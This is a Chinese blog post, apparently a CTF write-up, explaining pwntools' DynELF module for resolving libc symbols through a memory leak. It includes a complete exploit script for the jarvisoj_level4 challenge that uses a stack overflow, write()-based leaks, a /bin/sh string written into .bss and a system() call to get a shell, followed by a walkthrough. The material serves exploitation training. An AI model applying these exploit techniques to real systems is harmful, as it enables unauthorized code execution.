[PWN] jarvisoj_level4 DynELF()函数使用总结

最新推荐文章于 2024-07-28 11:23:13 发布
最新推荐文章于 2024-07-28 11:23:13 发布
阅读量91 收藏 2
点赞数
分类专栏: PWN 栈溢出 技巧 文章标签: 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/132924112
版权
PWN 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
技巧
8 篇文章 0 订阅
订阅专栏
栈溢出
4 篇文章 0 订阅
订阅专栏

参考:
https://blog.csdn.net/qq_40827990/article/details/86689760
https://blog.csdn.net/weixin_45770420/article/details/130493348

DynELF

DynELF是pwntools中专门用来应对题目中没有libc情况的漏洞利用模块,提供一个可以泄漏任意内存的函数后,任何被动态加载的库的任何符号都可以被解析
DynELF就是通过程序漏洞泄露出任意地址内容,结合ELF文件的结构特征获取对应版本文件并计算对比出目标符号在内存中的地址

使用模板

def leak(addr):
	   # 泄露 任意函数的地址
       payload=****+ p64(addr) +****”
       p.send(payload)
       data = p.recv()
       return data
# pointer 可选择 
d = DynELF(leak, pointer = pointer_into_ELF_file, elf = ELFObject)
system_addr = d.lookup('system', 'libc')
read_add = d.lookup('read','libc')

官网说明

# 假设现在有一个进程或者远程连接
p = process('./pwnme')

# 声明一个函数, 这个函数只接收一个参数, 作为要被泄漏的内存地址
# 并且至少泄漏这个地址的一个字节的数据
def leak(address):
    data = p.read(address, 4)
    log.debug("%#x => %s" % (address, (data or '').encode('hex')))
    return data

# 为了便于说明这个例子
# 假设我们有任意多的指针
# 一个指针指向二进制程序的某一个符号的指针
# 另两个指针指向 libc
main   = 0xfeedf4ce
libc   = 0xdeadb000
system = 0xdeadbeef

# 使用我们的泄漏器, 和一个指向二进制程序的某一个符号的指针
# 我们就能泄漏这个内存地址的任意数据
# 事实上为了解析符号, 我们都不需要对目标二进制进行拷贝
d = DynELF(leak, main)
assert d.lookup(None,     'libc') == libc
assert d.lookup('system', 'libc') == system

# 然而, 如果我们拷贝了这个二进制程序
# 这一步的速度就会快一点
d = DynELF(leak, main, elf=ELF('./pwnme'))
assert d.lookup(None,     'libc') == libc
assert d.lookup('system', 'libc') == system

# 我们也可以解析别的 lib 中的符号
# 然后返回这个符号的指针
d = DynELF(leak, libc + 0x1234)
assert d.lookup('system')      == system

注意事项

leak函数需要使用目标程序本身的漏洞泄露出由DynELF类传入的int型参数addr对应的内存地址中的数据。且由于DynELF会多次调用leak函数,这个函数必须能任意次使用,即不能泄露几个地址之后就导致程序崩溃。由于需要泄露数据,payload中必然包含着打印函数,如write, puts, printf等;
write函数是最理想的,write函数的特点在于其输出完全由其参数size决定,只要目标地址可读,size填多少就输出多少,不会受到诸如‘\0’, ‘\n’之类的字符影响;
puts, printf函数会受到诸如‘\0’, ‘\n’之类的字符影响,在对数据的读取和处理有一定的难度
在信息泄露过程中,由于循环制造溢出,故可能会导致栈结构发生不可预料的变化,可以尝试调用目标二进制程序的_start函数来重新开始程序以恢复栈.

例题:BUUCTF jarvisoj_level4

在这里插入图片描述
简单明显的栈溢出,ret2libc失败,LibSearch没找到对应的libc版本
需要将/bin/sh字符串写在bss段,作为system函数的参数以获取shell
大佬的WP:

from pwn import *
from time import sleep
import sys
context.binary = "./level4"
elf = context.binary
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]

if sys.argv[1] == "l":
    io = process("./level4")
else:
    io = remote('node4.buuoj.cn',26657)

def leak(addr):
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
# pause()
#  gdb.attach(io)
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)

payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)
io.interactive()

解析

leak函数:利用write函数打印addr地址的内容(即任意函数的地址),执行完write函数返回_start函数 程序入口,接收并返回打印的内容

def leak(addr):
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

调用DynELF()函数,lookup获取system函数的地址

d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')

利用read函数向bss段中间某位置写入/bin/sh字符串

payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)

最后调用system(“/bin/sh”)函数获取shell

payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
看海就会失去海
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
实验室责任人员管理保障实训系统安全
最新发布
07-28 239
​ 在智慧校园的实训管理生态中,实验室责任人员的角色犹如精密机器中的关键齿轮,他们不仅是实验室安全与高效运转的守护者,更是实训教学质量的直接塑造者。这一角色的重要性,在智慧校园的数字化转型中得到了前所未有的凸显,通过一系列精心设计的功能模块,实验室责任人员得以在更加智能化、系统化的环境中履行其职责,确保每一场实训都能在安全、有序且富有成效的环境下进行。
Windows系统安全加固方案:快速上手系统加固指南 (下)
m0_68483928的博客
07-25 1025
在上一部分的指南中,我们深入探讨了Windows系统加固的各个方面,帮助你更好地保护你的系统安全。然而,我们仅仅触及了冰山一角。接下来,我们将继续深入,具体讲解IP协议的安全配置、文件权限管理、服务安全设置以及安全选项等关键领域。通过这些实用的安全加固技巧,你将能够进一步提升系统的安全性,保护你的数据和隐私。请继续关注,获取更多详细的信息和专业建议。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 843
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Linux相关指令
m0_46502962的博客
07-25 144
其中的-lpthread不是必须的,只有用到该库才输入加上。//该指令将demo.c生成的a.out文件命名为demo8。//将运行结果放到test.ret.txt文件中,没有就创建。1.查看手册 man 3 free。将该运行程序放到后台运行。③(gbd)r 运行。④(gbd)q 退出。
Linux Vim教程:多文件编辑与窗口管理
07-25 868
Vim作为一款功能强大的文本编辑器,支持多文件编辑和窗口管理。掌握这些高级技巧可以大大提高工作效率和文件处理能力。本文将详细介绍Vim中多文件编辑与窗口管理的各种方法和技巧,包括缓冲区、标签页、分屏、快速切换等。通过这些实用技巧,您可以更高效地在Vim中进行复杂的文本编辑任务。
linux上导出数据库
weixin_43652507的博客
07-24 283
linux上导出数据库 MySQL、PostgreSQL、SQLite、MongoDB
Linux下pip的安装、命令总结、换源
2301_79695159的博客
07-24 525
Linux下pip的安装、命令总结、换源
LinuxLinux makefile 教程
沐风—云端行者
07-23 696
什么是makefile?或许很多Winodws的程序员都不知道这个东西,因为那些Windows的IDE都为你做了这个工作,但我觉得要作一个好的和professional的程序员,makefile还是要懂。这就好像现在有这么多的HTML的编辑器,但如果你想成为一个专业人士,你还是要了解HTML的标识的含义。特别在Unix下的软件编译,你就不能不自己写makefile了,会不会写makefile,从一个侧面说明了一个人是否具备完成大型工程的能力。因为,makefile关系到了整个工程的编译规则。一个工程中的源文
Linux守护进程daemon与服务service及systemctl命令的作用
云计算课代表
07-25 285
守护进程 daemon 是指后台运行的进程,随系统启动而为应用程序提供支持, 而服务 service 则用于提供某种功能。用 systemctl 命令对服务来完成启动、关闭、重启等操作。
linux设置~/.vimrc步骤
qq_43982499的博客
07-24 491
set backupdir=~/.vim/backup " 设置备份文件存放路径。set tabstop=4 " 设置Tab键宽度为4个空格。set shiftwidth=4 " 设置自动缩进宽度为4个空格。set undodir=~/.vim/undo " 设置撤销历史文件存放路径。set hlsearch " 搜索结果高亮显示。set fileformat=unix " 设置文件格式为Unix风格。
Linux 大页修改
weixin_57632548的博客
07-24 284
若操作系统当前Hugepagesize不是2048kB,则只能通过修改kernel cmdline的方式进行配置修改,此方式在系统重启后仍然生效。不同Linux发行版本的配置方式有所不同。
linux上面用drissionpage自动化遇到反爬?
十一姐的博客
07-25 487
【代码】在linux上面用drissionpage自动化遇到反爬?
linux】【设备树】具有 GPIO 控制器和连接器的硬件配置的备树(Device Tree)代码讲解
联系方式:927632640
07-25 679
这段代码配置了两个 GPIO 控制器,并通过 connector 节点将这些控制器的 GPIO 通过映射规则连接起来。expansion_device 节点使用 connector 节点中的一个 GPIO 来控制设备的复位。此配置允许灵活地管理 GPIO,并且能够适配不同的 GPIO 控制器和设备需求。
Linux嵌入书学习—数据结构——栈(seqstak)
m0_71703182的博客
07-25 569
是限定仅在表尾(栈顶)进行插入和删除操作的线性表栈又称为后进先出(Last In First Out)的线性表,简称 LIFO 结构。
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值